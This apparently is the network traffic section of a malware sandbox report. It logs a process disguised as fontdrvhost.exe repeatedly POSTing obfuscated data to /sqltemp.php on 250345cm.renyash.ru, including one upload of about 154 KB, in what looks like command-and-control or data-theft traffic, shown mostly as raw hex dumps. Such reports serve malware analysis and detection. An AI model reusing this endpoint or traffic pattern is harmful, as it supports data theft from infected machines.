                                                                                                                                                                                            Data Raw: 35 34 38 0d 0a 56 4a 7d 5c 78 7e 6b 02 79 71 64 4b 7f 72 63 4a 6a 67 73 08 7f 5e 7d 4f 6e 73 6c 4d 6a 62 67 58 76 73 76 54 79 58 7e 5f 62 76 55 5f 7e 61 78 01 55 4b 72 55 74 5c 68 59 7f 4c 57 06 7c 67 5f 51 79 76 55 54 7e 70 63 01 75 72 75 41 77 72 7d 47 68 58 69 5d 7e 6c 74 0d 69 67 7f 00 75 4c 7b 06 7c 5c 6d 00 6a 5e 5f 07 78 74 60 01 6f 5e 73 5f 6c 7e 63 02 7a 5c 78 46 7b 70 7e 4f 6b 63 7f 5f 7b 77 60 49 7d 61 78 5f 77 61 7c 05 7a 51 41 5b 6b 49 52 0a 68 71 58 52 75 42 73 5a 7b 6c 70 00 60 5e 71 50 7a 07 71 03 7e 42 57 5e 6c 61 66 00 75 73 7f 00 61 62 73 5d 76 62 62 50 7e 5d 7a 06 76 62 6d 07 76 66 74 09 7e 6c 65 01 77 6f 7f 5d 68 5a 7c 00 78 6f 6c 5a 7b 06 76 4b 6b 6d 5a 08 77 77 6f 5d 7e 62 72 09 7e 6e 7c 53 78 7d 65 5f 7d 5b 6a 5b 7b 5d 46 51 7c 6f 68 43 7d 59 77 55 6a 49 62 4c 6f 7d 60 59 78 72 7b 5c 7f 61 63 03 7d 59 60 52 6b 60 76 50 79 63 70 04 7f 61 78 05 60 5d 71 51 7b 5c 79 4a 75 48 64 4a 7e 58 70 06 7d 66 6d 4f 74 72 55 03 7c 72 57 05 7c 67 50 41 7b 66 6c 0c 7e 4d 67 01 75 4c 7d 06 77 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: 548VJ}\x~kyqdKrcJjgs^}OnslMjbgXvsvTyX~_bvU_~axUKrUt\hYLW|g_QyvUT~pcuruAwr}GhXi]~ltiguL{|\mj^_xt`o^s_l~cz\xF{p~Okc_{w`I}ax_wa|zQA[kIRhqXRuBsZ{lp`^qPzq~BW^lafusabs]vbbP~]zvbmvft~lewo]hZ|xolZ{vKkmZwwo]~br~n|Sx}e_}[j[{]FQ|ohC}YwUjIbLo}`Yxr{\ac}Y`Rk`vPycpax`]qQ{\yJuHdJ~Xp}fmOtrU|rW|gPA{fl~MguL}wO[H~qjI~|x~IYv_QHzb[~`_D{I|{IlOy}gKz\VzsrAN^xw|~Lowa|~|g}gh_mu||x|VHwpryO}G~RP{OvwcUDuqdt_T
                                                                                                                                                                                            Jan 1, 2025 14:52:07.825967073 CET915INData Raw: 7f 60 50 06 74 62 69 4c 76 65 78 0d 7f 52 61 07 77 52 70 4d 7f 4d 60 03 78 52 51 03 7a 60 7a 4a 7c 53 68 41 74 77 68 07 7e 5c 7a 0b 7c 7d 6f 0d 78 6d 7e 4c 7e 62 5b 06 7d 70 52 4f 7f 7c 5e 43 7f 60 60 40 7d 49 7e 07 78 53 59 49 7b 72 70 48 7c 61
                                                                                                                                                                                            Data Ascii: `PtbiLvexRawRpMM`xRQz`zJ|ShAtwh~\z|}oxm~L~b[}pRO|^C``@}I~xSYI{rpH|aU~IUO|Nyz]RB}LlFt]W{auvfp~XZfyvrwbq|wjxv|A}Mku\utOaJ~qz~lpC}IUvOH{Ly|p_{wxNywhxS{y\x{]\{]NZ{^gX}LoNv_l|oK^wU|y@uBZ{BdcpvyanZ~lz_z\y
                                                                                                                                                                                            Jan 1, 2025 14:52:07.863492966 CET294OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 384
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:07.959615946 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:07.960716009 CET384OUTData Raw: 53 54 5a 57 51 5f 54 55 58 56 52 59 56 58 59 5f 5b 5c 54 5d 55 5e 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZWQ_TUXVRYVXY_[\T]U^PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'/%[ $.$/*># ??T> 4"7[+5&:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:08.213924885 CET961INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:08 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTE5u2oWCRUJOMKWX2nn3dPqHZ%2Fw%2Ff7i7WA9kHOW69X4GCN98fk%2FChnvVAgApBh3DsK4Ntn7dJyVtj%2FHAdgBFiAs7vLGO7elfveSEvfPWFhFx1rjgEgR%2BmWLbOjVqd4wbqPV4yG5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fcf178d3729b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3721&min_rtt=1929&rtt_var=3831&sent=9&recv=9&lost=0&retrans=0&sent_bytes=2201&recv_bytes=1340&delivery_rate=2198795&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 57 28 3d 32 54 32 1c 20 1e 3c 13 33 1f 32 00 2e 59 2b 16 36 5f 27 10 3c 00 3d 29 33 5a 35 2f 36 03 26 16 30 5a 23 2d 20 01 33 0e 2b 59 05 1c 20 0b 35 06 2c 5b 28 2d 2b 15 32 01 08 04 24 2e 24 59 2b 3b 30 1e 34 05 33 1d 27 04 28 5d 2a 04 0e 54 27 02 01 16 2d 06 21 56 26 3a 2c 54 00 11 26 57 30 0f 38 1b 23 27 0e 5a 36 31 3d 5f 25 34 29 0f 26 3c 0d 53 37 5f 21 05 31 54 20 07 35 1d 3a 5f 25 28 32 00 37 3d 0e 0a 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%W(=2T2 <32.Y+6_'<=)3Z5/6&0Z#- 3+Y 5,[(-+2$.$Y+;043'(]*T'-!V&:,T&W08#'Z61=_%4)&<S7_!1T 5:_%(27=*.%S -H?WS0
                                                                                                                                                                                            Jan 1, 2025 14:52:08.358175039 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1508
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:08.454843044 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:08.455132008 CET1508OUTData Raw: 53 57 5f 5d 54 58 54 54 58 56 52 59 56 58 59 5f 5b 5c 54 5c 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_]TXTTXVRYVXY_[\T\UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$<5X7)_$;D.*)R!.0+9<(=# T4*8>1$.&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:08.713139057 CET959INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:08 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0k3wvpSpcJQb4pKU8pCvVQ5GAsYWMIl%2BCtJxyDSz9SQFKt6%2BDhfo0BkvJnTKtOFlvTvLAdPXD4Qouf8yUHkKlhNg1M8kOf1YQy3mlVPw%2FDdxcxIJVA1PjXSVJIM3GHxNtDilpnuN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fcf48ad4729b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5643&min_rtt=1929&rtt_var=6585&sent=14&recv=14&lost=0&retrans=0&sent_bytes=3187&recv_bytes=3143&delivery_rate=2198795&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0c 3d 2d 00 57 24 21 30 5b 3f 03 01 53 25 3d 2e 10 29 2b 39 01 24 2e 3f 11 29 29 37 10 21 2c 21 5e 26 28 2b 00 21 2d 3b 58 25 34 2b 59 05 1c 20 45 36 01 23 03 29 13 2f 5f 26 11 0f 11 30 00 01 05 2b 28 0e 52 20 2b 0d 5b 27 3d 12 11 3d 29 30 56 24 2c 3c 02 2d 3f 0c 0a 33 3a 2c 54 00 11 25 0c 27 22 3c 16 23 19 3c 12 35 21 17 1d 32 24 2e 51 32 12 27 50 20 5f 26 59 25 32 27 12 35 30 25 03 32 3b 2a 03 20 3d 27 19 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&=-W$!0[?S%=.)+9$.?))7!,!^&(+!-;X%4+Y E6#)/_&0+(R +['==)0V$,<-?3:,T%'"<#<5!2$.Q2'P _&Y%2'50%2;* ='=>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.449734104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:08.049796104 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:08.401794910 CET1012OUTData Raw: 56 56 5a 56 54 51 54 53 58 56 52 59 56 5f 59 51 5b 59 54 50 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VVZVTQTSXVRYV_YQ[YTPUUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'<5\ ?=3>#D/U#[8+;)>4Z#T+*8>&<(:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:52:08.493539095 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:08.755443096 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:08 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kdCE8IoEbXNl1u37YaXLYMRS8T4hitX9b2N7nPKKoxrnVM8vzsd%2FLbKMdWB5wmu%2FvhSmVAYT%2FNxy6gWRK5%2BmK0iqB0tDW5dbkCpBrampkRAOFA4METpWWimxv1NKvNqkYNNZu0Zn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fcf4cb475e60-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1681&rtt_var=645&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=838598&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.449737104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:08.972718954 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:09.323801994 CET1012OUTData Raw: 53 54 5f 50 51 58 54 55 58 56 52 59 56 51 59 5e 5b 59 54 58 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_PQXTUXVRYVQY^[YTXU[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/Y ?1X' /)14.$(*?W).; T4<B&?:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:09.417026043 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:09.689493895 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:09 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inu7lHyCBc%2BgtEzmElAHyW8bknUkCHjb%2F5TEfXEX3GAxvyGzzYSPqH%2FA30wnUZD3ezvCOULy%2Bd3yOM5m5dtRXeNXxQVyyh%2FI0crJgwa6B03qhDfVCd7Mp3izu3UTICZH03jhDu1e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fcfa9dd4c443-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4474&min_rtt=1591&rtt_var=6363&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=59212&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.449738104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:09.869743109 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:10.214369059 CET1012OUTData Raw: 56 52 5f 5d 51 5b 54 56 58 56 52 59 56 58 59 55 5b 5c 54 5b 55 5e 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_]Q[TVXVRYVXYU[\T[U^P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$?.#/'. /24?*:$><\74+)D2??R9*&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:10.313841105 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:10.579663992 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:10 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEmQ0l2Kh3ZLl7gdYSHrI62oeZ7h9WJg2lKwoKHmAlnH8BSGoDocgk7C3whGpTNt%2FMR5T51F%2BYgi9idFnDQN0CVWQZb6HSdFIzLiKRu2bbTobk5GmFWxzkVsYpHm0Nl5cu3jvSw3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd002fc48c0b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4061&min_rtt=1951&rtt_var=4953&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=77507&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.449741104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:10.723453045 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:11.073700905 CET1008OUTData Raw: 56 51 5f 52 54 51 54 52 58 56 52 59 56 59 59 56 5b 5b 54 51 55 5f 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_RTQTRXVRYVYYV[[TQU_P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?4?-Y0.,!.8Y+)7T>[74+1/,*&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:11.177349091 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:11.447164059 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:11 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6BNJpCaIn8MSNWoCy5Dn2fRC%2FkI0bm3NZG%2FJBJyGFe7ERWrUYOp2T9NBzOAbNQQORl%2FUukD1EvJHZlBT7zae6oagmxH%2BlIY%2F7oUn0MCdvQKfYTz4v5ubFfI8rmags56gG%2B%2BJYvvX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd05986042b1-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3430&min_rtt=1743&rtt_var=4028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=95794&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.449743104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:11.577650070 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.449745104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:11.754810095 CET321OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 154108
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:12.105091095 CET12360OUTData Raw: 56 55 5a 51 51 5b 51 51 58 56 52 59 56 5e 59 50 5b 5a 54 50 55 5a 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VUZQQ[QQXVRYV^YP[ZTPUZP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'<9[ <-33/)9V .'+9?*?!"#[<8!1?'9&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110088110 CET2472OUTData Raw: 3c 3b 23 10 3e 3f 01 27 05 28 33 0b 24 5b 3c 3f 01 05 3e 36 3f 00 11 03 00 20 35 0f 0b 2d 34 5e 09 19 30 12 3b 1f 36 20 0e 37 2d 20 31 2f 1a 39 34 00 39 01 3b 0b 3b 1c 08 20 5a 3c 09 29 04 26 0d 21 3f 16 30 2a 59 04 0c 07 21 36 00 20 21 0f 23 28
                                                                                                                                                                                            Data Ascii: <;#>?'(3$[<?>6? 5-4^0;6 7- 1/949;; Z<)&!?0*Y!6 !#(8^*?,Q'*5$,55&%2U5U?5=X4!?$=&?,'?C6:*+<[/,)]0=]]!<"%=>>/]+'[8-]0;V5%X2"-,-,(XY<<<%9WY3(=>::8+>VX<!+5UC?,#22(
                                                                                                                                                                                            Jan 1, 2025 14:52:12.110125065 CET2472OUTData Raw: 3e 20 07 13 08 2d 27 18 2a 14 35 34 0b 3e 0e 5a 30 23 5d 0b 06 03 2d 0f 32 33 11 59 28 5b 20 29 3f 3f 5e 1f 03 07 1b 2b 27 00 3f 1f 2c 5f 53 26 0c 5b 2e 3a 3f 07 5c 07 23 3f 38 20 21 54 12 3e 2e 22 23 1d 09 05 23 1a 3e 05 33 5d 0a 23 26 59 3d 58
                                                                                                                                                                                            Data Ascii: > -'*54>Z0#]-23Y([ )??^+'?,_S&[.:?\#?8 !T>."##>3]#&Y=X1V8,??6;7$Y!:X"=> .=5$1<771)-/$# 81/&> '!_Z?YS+\>#0WR %9?/39X"B4([]?]V1,81':*5<;)7='\2]##\<
